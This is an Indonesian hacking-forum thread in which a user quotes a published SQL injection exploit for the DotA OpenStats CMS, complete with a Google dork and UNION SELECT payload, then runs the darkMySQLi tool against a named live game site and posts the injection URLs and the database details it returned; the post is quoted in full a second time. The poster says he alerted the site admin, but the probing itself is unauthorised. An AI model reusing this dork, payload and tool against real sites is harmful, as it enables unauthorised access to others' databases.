BUG di situs cms DOTA ..
awalnya saya main2 ke db-exploit.. ketemu ama exploit temuan anak-anak bangsa ..

# Exploit Title: DotA OpenStats SQL Injection Vulnerability
# Google Dork: "© 2011 Powered by DotA OpenStats"
# Date: 19/12/2011
# Author: HvM17
# Version: 1.3.9 and below
# Tested on: WinXP

# VenDor : http://openstats.iz.rs/
# Download script: https://sourceforge.net/projects/dotaopenstats/

[~] Exploit

http://localhost/dotaStats/index.php?id='1 UNION SELECT 1,2,3,4

Greetz for All HVM crew Smile

kyknya ini situs dota gitu Tongue

langsung saya coba di salah satu situs yg menggunakan vendor cms tersebut ,..


yup langsung error mysql nampak

sesuai dengan exploitna .. sy temukan 4 colom .. sy coba pake d4rkMySQLi.py ...

cassaprodigy@l3l3r{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://rank.battlenet.web.id/index.php?id=1 --findcol

| [email protected]                         v1.6   |
|   1/2009      darkMySQLi.py                      |
|     -- Multi Purpose MySQL Injection Tool --     |
| Usage: darkMySQLi.py [options]                   |
|                      -h help       darkc0de.com  |

[+] URL: http://rank.battlenet.web.id/index.php?id=1
[+] 16:03:44
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,3,4,
[+] Column Length is: 4
[+] Found null column at column #: 1,2,3,

[!] SQLi URL: http://rank.battlenet.web.id/index.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4--
[!] darkMySQLi URL: http://rank.battlenet.web.id/index.php?id=1+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,4--

penulusuran lebih jauh ternyata makin tajam ...

[+] Gathering MySQL Server Configuration...
    Database: battlene_bot-godlike
    User: [email protected]
    Version: 5.0.92-community-log

sudah saya pm adminnya mudah2an di patch .. karena lebay.web.id setahu ane situs game lumayan terkenal ..

masih ada lagi .. tolong admin di pm ..


rata-rata situs indo.. masih banyak lagi situs dengan hole yang sama... hikz ..

wah, baik banget om, mw ngasih tw admin nya,, biasanya klo grup2 underground di fb, malah nanti index nya di deface om..

hehehe beda bro.... di sini dilarang ngedeface Tongue .. kalu bisa di bantu adminnya biar patch ...khusus untuk indonesia saja

semangat membangun Smile

(12-24-2011, 05:41 PM)cassaprodigy Wrote: awalnya saya main2 ke db-exploit.. ketemu ama exploit temuan anak-anak bangsa ..

# Exploit Title: DotA OpenStats SQL Injection Vulnerability
# Google Dork: "© 2011 Powered by DotA OpenStats"
# Date: 19/12/2011
# Author: HvM17
# Version: 1.3.9 and below
# Tested on: WinXP

# VenDor : http://openstats.iz.rs/
# Download script: https://sourceforge.net/projects/dotaopenstats/

[~] Exploit

http://localhost/dotaStats/index.php?id='1 UNION SELECT 1,2,3,4

Greetz for All HVM crew Smile

kyknya ini situs dota gitu Tongue

langsung saya coba di salah satu situs yg menggunakan vendor cms tersebut ,..


yup langsung error mysql nampak

sesuai dengan exploitna .. sy temukan 4 colom .. sy coba pake d4rkMySQLi.py ...

cassaprodigy@l3l3r{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://rank.battlenet.web.id/index.php?id=1 --findcol

| [email protected]                         v1.6   |
|   1/2009      darkMySQLi.py                      |
|     -- Multi Purpose MySQL Injection Tool --     |
| Usage: darkMySQLi.py [options]                   |
|                      -h help       darkc0de.com  |

[+] URL: http://rank.battlenet.web.id/index.php?id=1
[+] 16:03:44
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,3,4,
[+] Column Length is: 4
[+] Found null column at column #: 1,2,3,

[!] SQLi URL: http://rank.battlenet.web.id/index.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4--
[!] darkMySQLi URL: http://rank.battlenet.web.id/index.php?id=1+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,4--

penulusuran lebih jauh ternyata makin tajam ...

[+] Gathering MySQL Server Configuration...
    Database: battlene_bot-godlike
    User: [email protected]
    Version: 5.0.92-community-log

sudah saya pm adminnya mudah2an di patch .. karena lebay.web.id setahu ane situs game lumayan terkenal ..

masih ada lagi .. tolong admin di pm ..


rata-rata situs indo.. masih banyak lagi situs dengan hole yang sama... hikz ..

biar maju IT di indonesia.
jayalah terus IT indonesia.

Users browsing this thread: 2 Guest(s)